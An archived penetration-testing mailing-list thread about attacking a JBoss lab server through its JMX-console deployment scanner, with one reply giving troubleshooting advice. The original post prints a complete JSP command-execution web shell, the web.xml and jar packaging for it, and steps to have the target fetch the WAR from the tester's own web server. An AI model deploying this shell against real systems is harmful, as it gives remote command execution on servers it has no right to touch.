RE: breaking jboss with a browser? not happening

[lazers <a.alii85 () gmail com>]

Yes i tried the same method once again the only different thing i do was to
change my 
web-server from my machine running apache httpd server to WAMPSERVER.This
change did 
something miraculous for me .coz using that web-server i was able to upload
the cmd.war
onto the server. I verified this by viewing the file under the
jboss.management.local
section of the console.

However, this change all by sudden went away when my files were auto deleted
from the server. Before that i can access the file cmd.jsp but it was not
accessible as by code. Meaning i was 
getting gibberish like the whole output of the cmd.jsp was displayed in a
mix of text/acsii/and symbolic representation meaning i was not getting the
form page as it should according to the code.

But even then it was a big sign of relief since i was able to access the
file ; the only thing bothersome 
with the whole game was perhaps the representation of the file.

So i'm back to point blank 0 now.:(

i don't want to do the metasploit still cause i want to grab the lowest
hanging fruit first
something which require least knowledge and effort. And even if i skip this
to metasploit 
i have to document everything and provide a convincing explanation to my
manager for this change-over
As per now i don't really why this behavior is so erratic and random.

Please comment . THANKS

----------------

Hembrow, Chris wrote:
> I've never tried deploying a WAR this way, and I've not used JBoss in a
> few=  years, but I'll try a few suggestions.  In the JBoss console, can
> you see = a list of the deployed web apps somewhere?  This might let you
> see when/if = yours is deployed.
>
> JBoss includes embedded Tomcat which handles the actual HTTP elements. 
> Cre= ating the WAR is just packaging for deployment, JSPs are compiled on
> the fl= y.  If there was an issue with your code you should get a 500
> error, not 40= 4.
>
> Try deploying without the <servlet> block in the web.xml file; this
> shouldn= 't be necessary for a JSP page.  Also, try including a regular
> HTML page (i= .e. not JSP) in the WAR and accessing that.  This will rule
> out a compilati= on issue.=20
>
> HTH
>
> Chris
>
> (Sorry for top posting, but Outlook sucks)
>
> -----Original Message-----
> From: listbounce () securityfocus com [mailto:listbounce () securityfocus com]
> On Behalf Of lazers
> Sent: 14 January 2011 20:03
> To: pen-test () securityfocus com
> Subject: breaking jboss with a browser? not happening
>
> I have been given task to break into jboss application by my senior sec
> manager at my company. 
> Its a hacking challenge staged in a test lab This is what i have been
> given.
> A web-access to jboss.
> Yes that pretty much it<3. He believes in less is more philosophy. With
> some get to start working info. I have been told that a vulnerability
> exists inthe application and its no 0 day exploit its an known
> vulnerability.It is set as an open-book challenge i can get help anywhere
> i like. So what i did so for?
>
>
> Yes i google ; but i also run a nessus scan and the scan brought me one
> HIGH vulnerability. Its has to do with the default Jboss installation
> using the JMX-Console. Its not a new vulnerability i was able to reach
> this conclusion as i start googling. This particular vulnerability is very
> popular; I was saying to myself that my problems are over and i would be
> break it into jboss in record time. But that has been largely un-true.
> Why? Well if it wasn't true i wouldn't be  here. I did the following (in
> steps) 
>  
>
> attack vector: deployment scanner feature
>
>  
>
>  
>
> 1.confirmed the default installation (by accessing localhost:9090) in my
> case its
>
> 9090 not 8080 as in hacking literature. Probably this is because em using
> a new version (idk exact reason)
>
>  
>
> 2.i wrote this jsp script(cmd.jsp) astold in sites.
>
> <%@ page import="java.util.*,java.io.*"%>
>
> <%
>
> %>
>
> <HTML><BODY>
>
> Commands with JSP
>
> <FORM METHOD="GET" NAME="myform"ACTION="">
>
> <INPUT TYPE="text" NAME="cmd">
>
> <INPUT TYPE="submit" VALUE="Send">
>
> </FORM>
>
> <pre>
>
> <%
>
> if (request.getParameter("cmd") != null) {
>
> out.println("Command: " + request.getParameter("cmd") +"<BR>");
>
> Process p =Runtime.getRuntime().exec(request.getParameter("cmd"));
>
> OutputStream os = p.getOutputStream();
>
> InputStream in = p.getInputStream();
>
> DataInputStream dis = new DataInputStream(in);
>
> String disr = dis.readLine();
>
> while ( disr != null ) {
>
> out.println(disr);
>
> disr = dis.readLine();
>
> }
>
> }
>
> %>
>
> </pre>
>
> </BODY></HTML>
>
>  
>
> 3.next i create a web.xml file to be placed in WEB-INF folder
>
>  
>
> <?xml version="1.0" ?>
>
> <web-app xmlns="http://java.sun.com/xml/ns/j2ee";
>
> xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance";
>
> xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee
>
> http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd";
>
> version="2.4">
>
> <servlet>
>
> <servlet-name>Command</servlet-name>
>
> <jsp-file>/cmd.jsp</jsp-file>
>
> </servlet>
>
> </web-app>
>
>  
>
> 4.I complied the file cmd.jsp by placing the web.xml file in WEB-INF
> folder
>
>  
>
> jar cvf cmd.war WEB-INF cmd.jsp
>
>  
>
> 5. I put this file in http-apache server. File cmd.war reside at htdocs
> folder. Can be accessed by url: mywebserver:80/cmd.war
>
>  
>
> 6.i go back to jboss defualt page and navigate myself to
> jboss.deploymentpage.
>
>  
>
> 7. in the addurl tab i enter path for my cmd.war file as
>
> http://mywebserver/cmd.war
>
>  
>
> 8. next i goto victim webserver in attempt to access my uploaded
> application http://victim:9090/cmd/cmd.jsp
>
>  
>
> 9. i get HTTP STATUS 404- /cmd/cmd.jsp
>
>  
>
> my app is suppose to be hot deployed by the jboss; but this is not the
> case coz even after 10-20 times after u have access the file i get the
> same error page. I want to know what is the reason for the behavior. I
> know there exists other attack vector (e.g rmi and etc) but i want to
> stick to this until i don't figure out the reason for this failure of
> exploit.
>
>  
>
> Em i compiling the .jsp file with incorrect syntax? do i need to have
> tomcat server installed instead? I read it on internet that there could be
> some problems in the jboss trying to get reverse shell on your web-server
> as jboss is it work in bind-shell mode only? I'm really clueless to what i
> happening i spent 12 works on this single attack vector but em not making
> head-ways.
>
>  
>
> jboss gurus help me.
>
>  
>
> thanks
> --
> View this message in context:
> http://old.nabble.com/breaking-jboss-with-a-browser--not-happening-tp30674976p30674976.html
> Sent from the Penetration Testing mailing list archive at Nabble.com.
>
>
> ------------------------------------------------------------------------
> This list is sponsored by: Information Assurance Certification Review
> Board
>
> Prove to peers and potential employers without a doubt that you can
> actually do a proper penetration test. IACRB CPT and CEPT certs require a
> full practical examination in order to become certified. 
>
> http://www.iacertification.org
> ------------------------------------------------------------------------
>
>
>
> This e-mail has been scanned for all viruses by WebSense MailControl.
> www.websense.com
>
> Click https://www.mailcontrol.com/sr/wQw0zmjPoHdJTZGyOCrrhg==  to report
> this
> email as spam.
>
>
> "This email and any file attachments do not form a contract unless
> expressly stated. They may contain privileged, confidential and/or
> copyright information. If you are not the intended recipient or the
> service provider responsible for delivering this please delete the
> material from any computer and return to the sender at once; do not use,
> disclose or reproduce its contents. We do not accept liability for any
> error or omission in the message arising from corruption of, delay in or
> interference with, its transmission. We reserve the right to monitor email
> communications through normal internal and external networks. We believe
> but do not warrant that the email and the file attachments are virus
> free." 
>
> Interservefm Ltd.  Registered in England, Number : 2820560.
> Registered Office: Capital Tower, 91 Waterloo Road, London SE1 8RT.
>
> ------------------------------------------------------------------------
> This list is sponsored by: Information Assurance Certification Review
> Board
>
> Prove to peers and potential employers without a doubt that you can
> actually do a proper penetration test. IACRB CPT and CEPT certs require a
> full practical examination in order to become certified.
>
> http://www.iacertification.org
> ------------------------------------------------------------------------

-- 
View this message in context: 
http://old.nabble.com/breaking-jboss-with-a-browser--not-happening-tp30674976p30726535.html
Sent from the Penetration Testing mailing list archive at Nabble.com.


------------------------------------------------------------------------
This list is sponsored by: Information Assurance Certification Review Board

Prove to peers and potential employers without a doubt that you can actually do a proper penetration test. IACRB CPT 
and CEPT certs require a full practical examination in order to become certified. 

http://www.iacertification.org
------------------------------------------------------------------------